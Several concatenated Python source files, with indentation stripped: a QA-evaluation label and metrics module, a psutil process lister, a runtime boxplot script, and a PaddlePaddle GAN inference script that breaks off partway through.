# Create a unique ID (either new one, or one from user input)
if id:
self.id = str(id)
else:
self.id = str(uuid4())
if created_at is None:
created_at = time.strftime("%Y-%m-%d %H:%M:%S")
self.created_at = created_at
self.updated_at = updated_at
self.query = query
self.answer = answer
self.document = document
self.is_correct_answer = is_correct_answer
self.is_correct_document = is_correct_document
self.origin = origin
# Remove
# self.document_id = document_id
# self.offset_start_in_doc = offset_start_in_doc
# If an Answer is provided we need to make sure that it's consistent with the `no_answer` value
# TODO: reassess if we want to enforce Span.start=0 and Span.end=0 for no_answer=True
if self.answer is not None:
if no_answer == True:
if self.answer.answer != "" or self.answer.context:
raise ValueError(f"Got no_answer == True while there seems to be an possible Answer: {self.answer}")
elif no_answer == False:
if self.answer.answer == "":
raise ValueError(
f"Got no_answer == False while there seems to be no possible Answer: {self.answer}"
)
else:
# Automatically infer no_answer from Answer object
if self.answer.answer == "" or self.answer.answer is None:
no_answer = True
else:
no_answer = False
self.no_answer = no_answer
# TODO autofill answer.document_id if Document is provided
self.pipeline_id = pipeline_id
if not meta:
self.meta = dict()
else:
self.meta = meta
def to_dict(self):
return asdict(self)
@classmethod
def from_dict(cls, dict: dict):
return _pydantic_dataclass_from_dict(dict=dict, pydantic_dataclass_type=cls)
def to_json(self):
return json.dumps(self, default=pydantic_encoder)
@classmethod
def from_json(cls, data):
if type(data) == str:
data = json.loads(data)
return cls.from_dict(data)
# define __eq__ and __hash__ functions to deduplicate Label Objects
def __eq__(self, other):
return (
isinstance(other, self.__class__)
and getattr(other, "query", None) == self.query
and getattr(other, "answer", None) == self.answer
and getattr(other, "is_correct_answer", None) == self.is_correct_answer
and getattr(other, "is_correct_document", None) == self.is_correct_document
and getattr(other, "origin", None) == self.origin
and getattr(other, "document", None) == self.document
and getattr(other, "no_answer", None) == self.no_answer
and getattr(other, "pipeline_id", None) == self.pipeline_id
)
def __hash__(self):
return hash(
self.query
+ str(self.answer)
+ str(self.is_correct_answer)
+ str(self.is_correct_document)
+ str(self.origin)
+ str(self.document)
+ str(self.no_answer)
+ str(self.pipeline_id)
)
def __repr__(self):
return str(self.to_dict())
def __str__(self):
return str(self.to_dict())
@dataclass
class MultiLabel:
def __init__(self, labels: List[Label], drop_negative_labels=False, drop_no_answers=False):
"""
There are often multiple `Labels` associated with a single query. For example, there can be multiple annotated
answers for one question or multiple documents contain the information you want for a query.
This class is "syntactic sugar" that simplifies the work with such a list of related Labels.
It stored the original labels in MultiLabel.labels and provides additional aggregated attributes that are
automatically created at init time. For example, MultiLabel.no_answer allows you to easily access if any of the
underlying Labels provided a text answer and therefore demonstrates that there is indeed a possible answer.
:param labels: A list of labels that belong to a similar query and shall be "grouped" together
:param drop_negative_labels: Whether to drop negative labels from that group (e.g. thumbs down feedback from UI)
:param drop_no_answers: Whether to drop labels that specify the answer is impossible
"""
# drop duplicate labels and remove negative labels if needed.
labels = list(set(labels))
if drop_negative_labels:
is_positive_label = lambda l: (l.is_correct_answer and l.is_correct_document) or (
l.answer is None and l.is_correct_document
)
labels = [l for l in labels if is_positive_label(l)]
if drop_no_answers:
labels = [l for l in labels if l.no_answer == False]
self.labels = labels
self.query = self._aggregate_labels(key="query", must_be_single_value=True)[0]
# Currently no_answer is only true if all labels are "no_answers", we could later introduce a param here to let
# users decided which aggregation logic they want
self.no_answer = False not in [l.no_answer for l in self.labels]
# Answer strings and offsets cleaned for no_answers:
# If there are only no_answers, offsets are empty and answers will be a single empty string
# which equals the no_answers representation of reader nodes.
if self.no_answer:
self.answers = [""]
self.gold_offsets_in_documents: List[dict] = []
self.gold_offsets_in_contexts: List[dict] = []
else:
answered = [l.answer for l in self.labels if not l.no_answer and l.answer is not None]
self.answers = [answer.answer for answer in answered]
self.gold_offsets_in_documents = []
self.gold_offsets_in_contexts = []
for answer in answered:
if answer.offsets_in_document is not None:
for span in answer.offsets_in_document:
self.gold_offsets_in_documents.append({"start": span.start, "end": span.end})
if answer.offsets_in_context is not None:
for span in answer.offsets_in_context:
self.gold_offsets_in_contexts.append({"start": span.start, "end": span.end})
# There are two options here to represent document_ids:
# taking the id from the document of each label or taking the document_id of each label's answer.
# We take the former as labels without answers are allowed.
#
# For no_answer cases document_store.add_eval_data() currently adds all documents coming from the SQuAD paragraph's context
# as separate no_answer labels, and thus with document.id but without answer.document_id.
# If we do not exclude them from document_ids this would be problematic for retriever evaluation as they do not contain the answer.
# Hence, we exclude them here as well.
self.document_ids = [l.document.id for l in self.labels if not l.no_answer]
self.document_contents = [l.document.content for l in self.labels if not l.no_answer]
def _aggregate_labels(self, key, must_be_single_value=True) -> List[Any]:
unique_values = set([getattr(l, key) for l in self.labels])
if must_be_single_value and len(unique_values) > 1:
raise ValueError(
f"Tried to combine attribute '{key}' of Labels, but found multiple different values: {unique_values}"
)
else:
return list(unique_values)
def to_dict(self):
return asdict(self)
@classmethod
def from_dict(cls, dict: dict):
return _pydantic_dataclass_from_dict(dict=dict, pydantic_dataclass_type=cls)
def to_json(self):
return json.dumps(self, default=pydantic_encoder)
@classmethod
def from_json(cls, data):
if type(data) == str:
data = json.loads(data)
return cls.from_dict(data)
def __repr__(self):
return str(self.to_dict())
def __str__(self):
return str(self.to_dict())
def _pydantic_dataclass_from_dict(dict: dict, pydantic_dataclass_type) -> Any:
"""
Constructs a pydantic dataclass from a dict incl. other nested dataclasses.
This allows simple de-serialization of pydentic dataclasses from json.
:param dict: Dict containing all attributes and values for the dataclass.
:param pydantic_dataclass_type: The class of the dataclass that should be constructed (e.g. Document)
"""
base_model = pydantic_dataclass_type.__pydantic_model__.parse_obj(dict)
base_mode_fields = base_model.__fields__
values = {}
for base_model_field_name, base_model_field in base_mode_fields.items():
value = getattr(base_model, base_model_field_name)
values[base_model_field_name] = value
dataclass_object = pydantic_dataclass_type(**values)
return dataclass_object
class NumpyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.ndarray):
return obj.tolist()
return json.JSONEncoder.default(self, obj)
class EvaluationResult:
def __init__(self, node_results: Dict[str, pd.DataFrame] = None) -> None:
"""
Convenience class to store, pass and interact with results of a pipeline evaluation run (e.g. pipeline.eval()).
Detailed results are stored as one dataframe per node. This class makes them more accessible and provides
convenience methods to work with them.
For example, you can calculate eval metrics, get detailed reports or simulate different top_k settings.
Example:
```python
| eval_results = pipeline.eval(...)
|
| # derive detailed metrics
| eval_results.calculate_metrics()
|
| # show summary of incorrect queries
| eval_results.wrong_examples()
```
Each row of the underlying DataFrames contains either an answer or a document that has been retrieved during evaluation.
Rows are enriched with basic infos like rank, query, type or node.
Additional answer or document specific evaluation infos like gold labels
and metrics depicting whether the row matches the gold labels are included, too.
The DataFrames have the following schema:
- query: the query
- gold_answers (answers only): the answers to be given
- answer (answers only): the answer
- context (answers only): the surrounding context of the answer within the document
- exact_match (answers only): metric depicting if the answer exactly matches the gold label
- f1 (answers only): metric depicting how well the answer overlaps with the gold label on token basis
- sas (answers only, optional): metric depciting how well the answer matches the gold label on a semantic basis
- gold_document_contents (documents only): the contents of the gold documents
- content (documents only): the content of the document
- gold_id_match (documents only): metric depicting whether one of the gold document ids matches the document
- answer_match (documents only): metric depicting whether the document contains the answer
- gold_id_or_answer_match (documents only): metric depicting whether one of the former two conditions are met
- rank: rank or 1-based-position in result list
- document_id: the id of the document that has been retrieved or that contained the answer
- gold_document_ids: the documents to be retrieved
- offsets_in_document (answers only): the position or offsets within the document the answer was found
- gold_offsets_in_documents (answers only): the positon or offsets of the gold answer within the document
- type: 'answer' or 'document'
- node: the node name
- eval_mode: evaluation mode depicting whether the evaluation was executed in integrated or isolated mode.
Check pipeline.eval()'s add_isolated_node_eval param for more information.
:param node_results: the evaluation Dataframes per pipeline node
"""
self.node_results: Dict[str, pd.DataFrame] = {} if node_results is None else node_results
def __getitem__(self, key: str):
return self.node_results.__getitem__(key)
def __delitem__(self, key: str):
self.node_results.__delitem__(key)
def __setitem__(self, key: str, value: pd.DataFrame):
self.node_results.__setitem__(key, value)
def __contains__(self, key: str):
return self.node_results.keys().__contains__(key)
def __len__(self):
return self.node_results.__len__()
def append(self, key: str, value: pd.DataFrame):
if value is not None and len(value) > 0:
if key in self.node_results:
self.node_results[key] = pd.concat([self.node_results[key], value])
else:
self.node_results[key] = value
def calculate_metrics(
self,
simulated_top_k_reader: int = -1,
simulated_top_k_retriever: int = -1,
doc_relevance_col: str = "gold_id_match",
eval_mode: str = "integrated",
) -> Dict[str, Dict[str, float]]:
"""
Calculates proper metrics for each node.
For document returning nodes default metrics are:
- mrr (Mean Reciprocal Rank: see https://en.wikipedia.org/wiki/Mean_reciprocal_rank)
- map (Mean Average Precision: see https://en.wikipedia.org/wiki/Evaluation_measures_%28information_retrieval%29#Mean_average_precision)
- ndcg (Normalized Discounted Cumulative Gain: see https://en.wikipedia.org/wiki/Discounted_cumulative_gain)
- precision (Precision: How many of the returned documents were relevant?)
- recall_multi_hit (Recall according to Information Retrieval definition: How many of the relevant documents were retrieved per query?)
- recall_single_hit (Recall for Question Answering: How many of the queries returned at least one relevant document?)
For answer returning nodes default metrics are:
- exact_match (How many of the queries returned the exact answer?)
- f1 (How well do the returned results overlap with any gold answer on token basis?)
- sas if a SAS model has bin provided during during pipeline.eval() (How semantically similar is the prediction to the gold answers?)
Lower top_k values for reader and retriever than the actual values during the eval run can be simulated.
E.g. top_1_f1 for reader nodes can be calculated by setting simulated_top_k_reader=1.
Results for reader nodes with applied simulated_top_k_retriever should be considered with caution
as there are situations the result can heavily differ from an actual eval run with corresponding top_k_retriever.
:param simulated_top_k_reader: simulates top_k param of reader
:param simulated_top_k_retriever: simulates top_k param of retriever.
remarks: there might be a discrepancy between simulated reader metrics and an actual pipeline run with retriever top_k
:param doc_relevance_col: column in the underlying eval table that contains the relevance criteria for documents.
values can be: 'gold_id_match', 'answer_match', 'gold_id_or_answer_match'
:param eval_mode: the input on which the node was evaluated on.
Usually nodes get evaluated on the prediction provided by its predecessor nodes in the pipeline (value='integrated').
However, as the quality of the node itself can heavily depend on the node's input and thus the predecessor's quality,
you might want to simulate a perfect predecessor in order to get an independent upper bound of the quality of your node.
For example when evaluating the reader use value='isolated' to simulate a perfect retriever in an ExtractiveQAPipeline.
Values can be 'integrated', 'isolated'.
Default value is 'integrated'.
"""
return {
node: self._calculate_node_metrics(
df,
simulated_top_k_reader=simulated_top_k_reader,
simulated_top_k_retriever=simulated_top_k_retriever,
doc_relevance_col=doc_relevance_col,
eval_mode=eval_mode,
)
for node, df in self.node_results.items()
}
def wrong_examples(
self,
node: str,
n: int = 3,
simulated_top_k_reader: int = -1,
simulated_top_k_retriever: int = -1,
doc_relevance_col: str = "gold_id_match",
document_metric: str = "recall_single_hit",
answer_metric: str = "f1",
eval_mode: str = "integrated",
) -> List[Dict]:
"""
Returns the worst performing queries.
Worst performing queries are calculated based on the metric
that is either a document metric or an answer metric according to the node type.
Lower top_k values for reader and retriever than the actual values during the eval run can be simulated.
See calculate_metrics() for more information.
:param simulated_top_k_reader: simulates top_k param of reader
:param simulated_top_k_retriever: simulates top_k param of retriever.
remarks: there might be a discrepancy between simulated reader metrics and an actual pipeline run with retriever top_k
:param doc_relevance_col: column that contains the relevance criteria for documents.
values can be: 'gold_id_match', 'answer_match', 'gold_id_or_answer_match'
:param document_metric: the document metric worst queries are calculated with.
values can be: 'recall_single_hit', 'recall_multi_hit', 'mrr', 'map', 'precision'
:param document_metric: the answer metric worst queries are calculated with.
values can be: 'f1', 'exact_match' and 'sas' if the evaluation was made using a SAS model.
:param eval_mode: the input on which the node was evaluated on.
Usually nodes get evaluated on the prediction provided by its predecessor nodes in the pipeline (value='integrated').
However, as the quality of the node itself can heavily depend on the node's input and thus the predecessor's quality,
you might want to simulate a perfect predecessor in order to get an independent upper bound of the quality of your node.
For example when evaluating the reader use value='isolated' to simulate a perfect retriever in an ExtractiveQAPipeline.
Values can be 'integrated', 'isolated'.
Default value is 'integrated'.
"""
node_df = self.node_results[node]
node_df = self._filter_eval_mode(node_df, eval_mode)
answers = node_df[node_df["type"] == "answer"]
if len(answers) > 0:
metrics_df = self._build_answer_metrics_df(
answers,
simulated_top_k_reader=simulated_top_k_reader,
simulated_top_k_retriever=simulated_top_k_retriever,
)
worst_df = metrics_df.sort_values(by=[answer_metric]).head(n)
wrong_examples = []
for query, metrics in worst_df.iterrows():
query_answers = answers[answers["query"] == query]
query_dict = {
"query": query,
"metrics": metrics.to_dict(),
"answers": query_answers.drop(
["node", "query", "type", "gold_answers", "gold_offsets_in_documents", "gold_document_ids"],
axis=1,
).to_dict(orient="records"),
"gold_answers": query_answers["gold_answers"].iloc[0],
"gold_document_ids": query_answers["gold_document_ids"].iloc[0],
}
wrong_examples.append(query_dict)
return wrong_examples
documents = node_df[node_df["type"] == "document"]
if len(documents) > 0:
metrics_df = self._build_document_metrics_df(
documents, simulated_top_k_retriever=simulated_top_k_retriever, doc_relevance_col=doc_relevance_col
)
worst_df = metrics_df.sort_values(by=[document_metric]).head(n)
wrong_examples = []
for query, metrics in worst_df.iterrows():
query_documents = documents[documents["query"] == query]
query_dict = {
"query": query,
"metrics": metrics.to_dict(),
"documents": query_documents.drop(
["node", "query", "type", "gold_document_ids", "gold_document_contents"], axis=1
).to_dict(orient="records"),
"gold_document_ids": query_documents["gold_document_ids"].iloc[0],
}
wrong_examples.append(query_dict)
return wrong_examples
return []
def _calculate_node_metrics(
self,
df: pd.DataFrame,
simulated_top_k_reader: int = -1,
simulated_top_k_retriever: int = -1,
doc_relevance_col: str = "gold_id_match",
eval_mode: str = "integrated",
) -> Dict[str, float]:
df = self._filter_eval_mode(df, eval_mode)
answer_metrics = self._calculate_answer_metrics(
df, simulated_top_k_reader=simulated_top_k_reader, simulated_top_k_retriever=simulated_top_k_retriever
)
document_metrics = self._calculate_document_metrics(
df, simulated_top_k_retriever=simulated_top_k_retriever, doc_relevance_col=doc_relevance_col
)
return {**answer_metrics, **document_metrics}
def _filter_eval_mode(self, df: pd.DataFrame, eval_mode: str) -> pd.DataFrame:
if "eval_mode" in df.columns:
df = df[df["eval_mode"] == eval_mode]
else:
logger.warning("eval dataframe has no eval_mode column. eval_mode param will be ignored.")
return df
def _calculate_answer_metrics(
self, df: pd.DataFrame, simulated_top_k_reader: int = -1, simulated_top_k_retriever: int = -1
) -> Dict[str, float]:
answers = df[df["type"] == "answer"]
if len(answers) == 0:
return {}
metrics_df = self._build_answer_metrics_df(
answers, simulated_top_k_reader=simulated_top_k_reader, simulated_top_k_retriever=simulated_top_k_retriever
)
return {metric: metrics_df[metric].mean() for metric in metrics_df.columns}
def _build_answer_metrics_df(
self, answers: pd.DataFrame, simulated_top_k_reader: int = -1, simulated_top_k_retriever: int = -1
) -> pd.DataFrame:
"""
Builds a dataframe containing answer metrics (columns) per query (index).
Answer metrics are:
- exact_match (Did the query exactly return any gold answer? -> 1.0 or 0.0)
- f1 (How well does the best matching returned results overlap with any gold answer on token basis?)
- sas if a SAS model has bin provided during during pipeline.eval() (How semantically similar is the prediction to the gold answers?)
"""
queries = answers["query"].unique()
# simulate top k reader
if simulated_top_k_reader != -1:
answers = answers[answers["rank"] <= simulated_top_k_reader]
# simulate top k retriever
if simulated_top_k_retriever != -1:
documents = self._get_documents_df()
top_k_documents = documents[documents["rank"] <= simulated_top_k_retriever]
simulated_answers = []
for query in queries:
top_k_document_ids = top_k_documents[top_k_documents["query"] == query]["document_id"].unique()
query_answers = answers[answers["query"] == query]
simulated_query_answers = query_answers[query_answers["document_id"].isin(top_k_document_ids)]
simulated_query_answers["rank"] = np.arange(1, len(simulated_query_answers) + 1)
simulated_answers.append(simulated_query_answers)
answers = pd.concat(simulated_answers)
# build metrics df
metrics = []
for query in queries:
query_df = answers[answers["query"] == query]
metrics_cols = set(query_df.columns).intersection(["exact_match", "f1", "sas"])
query_metrics = {metric: query_df[metric].max() if len(query_df) > 0 else 0.0 for metric in metrics_cols}
metrics.append(query_metrics)
metrics_df = pd.DataFrame.from_records(metrics, index=queries)
return metrics_df
def _get_documents_df(self):
document_dfs = [
node_df for node_df in self.node_results.values() if len(node_df[node_df["type"] == "document"]) > 0
]
if len(document_dfs) != 1:
raise ValueError("cannot detect retriever dataframe")
documents_df = document_dfs[0]
documents_df = documents_df[documents_df["type"] == "document"]
return documents_df
def _calculate_document_metrics(
self, df: pd.DataFrame, simulated_top_k_retriever: int = -1, doc_relevance_col: str = "gold_id_match"
) -> Dict[str, float]:
documents = df[df["type"] == "document"]
if len(documents) == 0:
return {}
metrics_df = self._build_document_metrics_df(
documents, simulated_top_k_retriever=simulated_top_k_retriever, doc_relevance_col=doc_relevance_col
)
return {metric: metrics_df[metric].mean() for metric in metrics_df.columns}
def _build_document_metrics_df(
self, documents: pd.DataFrame, simulated_top_k_retriever: int = -1, doc_relevance_col: str = "gold_id_match"
) -> pd.DataFrame:
"""
Builds a dataframe containing document metrics (columns) per query (index).
Document metrics are:
- mrr (Mean Reciprocal Rank: see https://en.wikipedia.org/wiki/Mean_reciprocal_rank)
- map (Mean Average Precision: see https://en.wikipedia.org/wiki/Evaluation_measures_(information_retrieval)#Mean_average_precision)
- precision (Precision: How many of the returned documents were relevant?)
- recall_multi_hit (Recall according to Information Retrieval definition: How many of the relevant documents were retrieved per query?)
- recall_single_hit (Recall for Question Answering: Did the query return at least one relevant document? -> 1.0 or 0.0)
"""
if simulated_top_k_retriever != -1:
documents = documents[documents["rank"] <= simulated_top_k_retriever]
metrics = []
queries = documents["query"].unique()
for query in queries:
query_df = documents[documents["query"] == query]
gold_ids = query_df["gold_document_ids"].iloc[0]
retrieved = len(query_df)
relevance_criteria_ids = list(query_df[query_df[doc_relevance_col] == 1]["document_id"].values)
num_relevants = len(set(gold_ids + relevance_criteria_ids))
num_retrieved_relevants = query_df[doc_relevance_col].values.sum()
rank_retrieved_relevants = query_df[query_df[doc_relevance_col] == 1]["rank"].values
avp_retrieved_relevants = [
query_df[doc_relevance_col].values[: int(rank)].sum() / rank for rank in rank_retrieved_relevants
]
avg_precision = np.sum(avp_retrieved_relevants) / num_relevants if num_relevants > 0 else 0.0
recall_multi_hit = num_retrieved_relevants / num_relevants if num_relevants > 0 else 0.0
recall_single_hit = min(num_retrieved_relevants, 1)
precision = num_retrieved_relevants / retrieved if retrieved > 0 else 0.0
rr = 1.0 / rank_retrieved_relevants.min() if len(rank_retrieved_relevants) > 0 else 0.0
dcg = (
np.sum([1.0 / np.log2(rank + 1) for rank in rank_retrieved_relevants])
if len(rank_retrieved_relevants) > 0
else 0.0
)
idcg = (
np.sum([1.0 / np.log2(rank + 1) for rank in range(1, num_relevants + 1)]) if num_relevants > 0 else 1.0
)
ndcg = dcg / idcg
metrics.append(
{
"recall_multi_hit": recall_multi_hit,
"recall_single_hit": recall_single_hit,
"precision": precision,
"map": avg_precision,
"mrr": rr,
"ndcg": ndcg,
}
)
metrics_df = pd.DataFrame.from_records(metrics, index=queries)
return metrics_df
def save(self, out_dir: Union[str, Path]):
"""
Saves the evaluation result.
The result of each node is saved in a separate csv with file name {node_name}.csv to the out_dir folder.
:param out_dir: Path to the target folder the csvs will be saved.
"""
out_dir = out_dir if isinstance(out_dir, Path) else Path(out_dir)
for node_name, df in self.node_results.items():
target_path = out_dir / f"{node_name}.csv"
df.to_csv(target_path, index=False, header=True)
@classmethod
def load(cls, load_dir: Union[str, Path]):
"""
Loads the evaluation result from disk. Expects one csv file per node. See save() for further information.
:param load_dir: The directory containing the csv files.
"""
load_dir = load_dir if isinstance(load_dir, Path) else Path(load_dir)
csv_files = [file for file in load_dir.iterdir() if file.is_file() and file.suffix == ".csv"]
cols_to_convert = ["gold_document_ids", "gold_document_contents", "gold_answers", "gold_offsets_in_documents"]
converters = dict.fromkeys(cols_to_convert, ast.literal_eval)
node_results = {file.stem: pd.read_csv(file, header=0, converters=converters) for file in csv_files}
result = cls(node_results)
return result
|
the-stack_106_15887
|
import csv
import logging
import psutil
from intelligence import intelligence
class processlist( intelligence ):
def __init__( self, output_type='csv' ):
super(processlist, self).__init__( output_type='csv' )
self.default_headers = None
def run( self ):
self.logger.info( 'running proc' )
for proc in psutil.process_iter( ):
r = proc.as_dict( )
if not self.default_headers:
self.logger.info( 'set CSV output headers' )
self.default_headers = r.keys()
self.add_result( proc.as_dict() )
|
the-stack_106_15888
|
# **********************************************************************************************************************
#
# brief: simple script to plot runtimes
#
# author: Lukas Reithmeier
# date: 16.08.2020
#
# **********************************************************************************************************************
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import os
plt.style.use('ggplot')
SMALL_SIZE = 14
MEDIUM_SIZE = 16
BIGGER_SIZE = 18
plt.rc('font', size=SMALL_SIZE) # controls default text sizes
plt.rc('axes', titlesize=SMALL_SIZE) # fontsize of the axes title
plt.rc('axes', labelsize=MEDIUM_SIZE) # fontsize of the x and y labels
plt.rc('xtick', labelsize=SMALL_SIZE) # fontsize of the tick labels
plt.rc('ytick', labelsize=SMALL_SIZE) # fontsize of the tick labels
plt.rc('legend', fontsize=SMALL_SIZE) # legend fontsize
plt.rc('figure', titlesize=BIGGER_SIZE) # fontsize of the figure title
FILE_DIR = os.path.abspath("../../")
runtime_rgb = np.load(FILE_DIR + "/runtimes_CPU_ELEVATOR_RGB.npy").clip(min=0)
runtime_d3 = np.load(FILE_DIR + "/runtimes_CPU_ELEVATOR_D3.npy").clip(min=0)
runtime_rgbd = np.load(FILE_DIR + "/runtimes_CPU_ELEVATOR_RGBD.npy").clip(min=0)
runtime_rgbdf = np.load(FILE_DIR + "/runtimes_CPU_ELEVATOR_RGBDFusenet.npy").clip(min=0)
print(runtime_rgb.mean())
print(runtime_rgb.std())
print(runtime_d3.mean())
print(runtime_d3.std())
print(runtime_rgbd.mean())
print(runtime_rgbd.std())
print(runtime_rgbdf.mean())
print(runtime_rgbdf.std())
print(runtime_rgb.shape)
fig, ax = plt.subplots()
data = pd.DataFrame()
data["RGB"] = runtime_rgb
data["D3"] = runtime_d3
data["RGBD"] = runtime_rgbd
data["RGBD-F"] = runtime_rgbdf
data.boxplot()
print(data.shape)
ax.set_xlabel("model-version")
ax.set_ylabel("inference time")
plt.show()
|
the-stack_106_15891
|
#copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import functools
import os
from PIL import Image
import paddle.fluid as fluid
import paddle
import numpy as np
import imageio
import glob
from util.config import add_arguments, print_arguments
from data_reader import celeba_reader_creator, reader_creator, triplex_reader_creator
from util.utility import check_attribute_conflict, check_gpu, save_batch_image, check_version
from util import utility
import copy
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser(description=__doc__)
add_arg = functools.partial(add_arguments, argparser=parser)
# yapf: disable
add_arg('model_net', str, 'CGAN', "The model used")
add_arg('net_G', str, "resnet_9block", "Choose the CycleGAN and Pix2pix generator's network, choose in [resnet_9block|resnet_6block|unet_128|unet_256]")
add_arg('init_model', str, None, "The init model file of directory.")
add_arg('output', str, "./infer_result", "The directory the infer result to be saved to.")
add_arg('input_style', str, "A", "The style of the input, A or B")
add_arg('norm_type', str, "batch_norm", "Which normalization to used")
add_arg('crop_type', str, None, "Which crop type to use")
add_arg('use_gpu', bool, True, "Whether to use GPU to train.")
add_arg('dropout', bool, False, "Whether to use dropout")
add_arg('g_base_dims', int, 64, "Base channels in CycleGAN generator")
add_arg('ngf', int, 64, "Base channels in SPADE generator")
add_arg('c_dim', int, 13, "the size of attrs")
add_arg('use_gru', bool, False, "Whether to use GRU")
add_arg('crop_size', int, 178, "crop size")
add_arg('image_size', int, 128, "image size")
add_arg('load_height', int, 128, "image size")
add_arg('load_width', int, 128, "image size")
add_arg('crop_height', int, 128, "height of crop size")
add_arg('crop_width', int, 128, "width of crop size")
add_arg('selected_attrs', str,
"Bald,Bangs,Black_Hair,Blond_Hair,Brown_Hair,Bushy_Eyebrows,Eyeglasses,Male,Mouth_Slightly_Open,Mustache,No_Beard,Pale_Skin,Young",
"the attributes we selected to change")
add_arg('n_samples', int, 16, "batch size when test")
add_arg('test_list', str, "./data/celeba/list_attr_celeba.txt", "the test list file")
add_arg('dataset_dir', str, "./data/celeba/", "the dataset directory to be infered")
add_arg('n_layers', int, 5, "default layers in generotor")
add_arg('gru_n_layers', int, 4, "default layers of GRU in generotor")
add_arg('noise_size', int, 100, "the noise dimension")
add_arg('label_nc', int, 36, "label numbers of SPADE")
add_arg('no_instance', type=bool, default=False, help="Whether to use instance label.")
# yapf: enable
def infer(args):
data_shape = [-1, 3, args.image_size, args.image_size]
input = fluid.layers.data(name='input', shape=data_shape, dtype='float32')
label_org_ = fluid.layers.data(
name='label_org_', shape=[args.c_dim], dtype='float32')
label_trg_ = fluid.layers.data(
name='label_trg_', shape=[args.c_dim], dtype='float32')
image_name = fluid.layers.data(
name='image_name', shape=[args.n_samples], dtype='int32')
model_name = 'net_G'
if args.model_net == 'CycleGAN':
loader = fluid.io.DataLoader.from_generator(
feed_list=[input, image_name],
capacity=4, ## batch_size * 4
iterable=True,
use_double_buffer=True)
from network.CycleGAN_network import CycleGAN_model
model = CycleGAN_model()
if args.input_style == "A":
fake = model.network_G(input, name="GA", cfg=args)
elif args.input_style == "B":
fake = model.network_G(input, name="GB", cfg=args)
else:
raise "Input with style [%s] is not supported." % args.input_style
elif args.model_net == 'Pix2pix':
loader = fluid.io.DataLoader.from_generator(
feed_list=[input, image_name],
capacity=4, ## batch_size * 4
iterable=True,
use_double_buffer=True)
from network.Pix2pix_network import Pix2pix_model
model = Pix2pix_model()
fake = model.network_G(input, "generator", cfg=args)
elif args.model_net == 'StarGAN':
py_reader = fluid.io.PyReader(
feed_list=[input, label_org_, label_trg_, image_name],
capacity=32,
iterable=True,
use_double_buffer=True)
from network.StarGAN_network import StarGAN_model
model = StarGAN_model()
fake = model.network_G(input, label_trg_, name="g_main", cfg=args)
elif args.model_net == 'STGAN':
from network.STGAN_network import STGAN_model
py_reader = fluid.io.PyReader(
feed_list=[input, label_org_, label_trg_, image_name],
capacity=32,
iterable=True,
use_double_buffer=True)
model = STGAN_model()
fake, _ = model.network_G(
input,
label_org_,
label_trg_,
cfg=args,
name='generator',
is_test=True)
elif args.model_net == 'AttGAN':
from network.AttGAN_network import AttGAN_model
py_reader = fluid.io.PyReader(
feed_list=[input, label_org_, label_trg_, image_name],
capacity=32,
iterable=True,
use_double_buffer=True)
model = AttGAN_model()
fake, _ = model.network_G(
input,
label_org_,
label_trg_,
cfg=args,
name='generator',
is_test=True)
elif args.model_net == 'CGAN':
noise = fluid.layers.data(
name='noise', shape=[args.noise_size], dtype='float32')
conditions = fluid.layers.data(
name='conditions', shape=[1], dtype='float32')
from network.CGAN_network import CGAN_model
model = CGAN_model(args.n_samples)
fake = model.network_G(noise, conditions, name="G")
elif args.model_net == 'DCGAN':
noise = fluid.layers.data(
name='noise', shape=[args.noise_size], dtype='float32')
from network.DCGAN_network import DCGAN_model
model = DCGAN_model(args.n_samples)
fake = model.network_G(noise, name="G")
elif args.model_net == 'SPADE':
label_shape = [None, args.label_nc, args.crop_height, args.crop_width]
spade_data_shape = [None, 1, args.crop_height, args.crop_width]
from network.SPADE_network import SPADE_model
model = SPADE_model()
input_label = fluid.data(
name='input_label', shape=label_shape, dtype='float32')
input_ins = fluid.data(
name='input_ins', shape=spade_data_shape, dtype='float32')
input_ = fluid.layers.concat([input_label, input_ins], 1)
fake = model.network_G(input_, "generator", cfg=args, is_test=True)
else:
raise NotImplementedError("model_net {} is not support".format(
args.model_net))
def _compute_start_end(image_name):
image_name_start = np.array(image_name)[0].astype('int32')
image_name_end = image_name_start + args.n_samples - 1
image_name_save = str(np.array(image_name)[0].astype('int32')) + '.jpg'
print("read {}.jpg ~ {}.jpg".format(image_name_start, image_name_end))
return image_name_save
# prepare environment
place = fluid.CPUPlace()
if args.use_gpu:
place = fluid.CUDAPlace(0)
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
for var in fluid.default_main_program().global_block().all_parameters():
print(var.name)
print(args.init_model + '/' + model_name)
fluid.io.load_persistables(exe, os.path.join(args.init_model, model_name))
print('load params done')
if not os.path.exists(args.output):
os.makedirs(args.output)
attr_names = args.selected_attrs.split(',')
if args.model_net == 'AttGAN' or args.model_net == 'STGAN':
test_reader = celeba_reader_creator(
image_dir=args.dataset_dir,
list_filename=args.test_list,
args=args,
mode="VAL")
reader_test = test_reader.make_reader(return_name=True)
py_reader.decorate_batch_generator(
reader_test,
places=fluid.cuda_places() if args.use_gpu else fluid.cpu_places())
for data in py_reader():
real_img, label_org, label_trg, image_name = data[0]['input'], data[
0]['label_org_'], data[0]['label_trg_'], data[0]['image_name']
image_name_save = _compute_start_end(image_name)
real_img_temp = save_batch_image(np.array(real_img))
images = [real_img_temp]
for i in range(args.c_dim):
label_trg_tmp = copy.deepcopy(np.array(label_trg))
for j in range(len(label_trg_tmp)):
label_trg_tmp[j][i] = 1.0 - label_trg_tmp[j][i]
label_trg_tmp = check_attribute_conflict(
label_trg_tmp, attr_names[i], attr_names)
label_org_tmp = list(
map(lambda x: ((x * 2) - 1) * 0.5, np.array(label_org)))
label_trg_tmp = list(
map(lambda x: ((x * 2) - 1) * 0.5, label_trg_tmp))
if args.model_net == 'AttGAN':
for k in range(len(label_trg_tmp)):
label_trg_tmp[k][i] = label_trg_tmp[k][i] * 2.0
tensor_label_org_ = fluid.LoDTensor()
